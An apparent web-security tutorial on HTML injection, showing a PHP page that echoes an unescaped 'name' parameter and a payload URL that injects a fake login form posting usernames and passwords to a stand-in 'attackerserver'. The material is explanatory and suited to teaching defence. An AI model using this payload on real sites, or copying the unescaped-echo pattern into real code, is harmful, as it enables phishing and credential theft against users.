Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.
This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
HTML Injection vs. Cross-site Scripting
A possible attack scenario is demonstrated below:
- Attacker discovers injection vulnerability and decides to use an HTML injection attack
- Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email
- The user visits the page due to the page being located within a trusted domain
- The attacker's injected HTML is rendered and presented to the user asking for a username and password
- The user enters a username and password, which are both sent to the attackers server
A simple PHP page containing an injection vulnerability via the name parameter:
<?php $name = $_REQUEST ['name']; ?> <html> <h1>Welcome to the Internet!</h1> <br> <body> Hello, <?php echo $name; ?>! <p>We are so glad you are here!</p> </body> </html>
The page functionality can be tested by making the following GET request to the page:
By requesting the link below, the page renders the injected HTML, presents a login form, and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named login.php on the attacker's server via POST.
http://127.0.0.1/vulnerable.php?name=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST" action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password" name="password" /><br /><input type="submit" value="Login" /></form><!--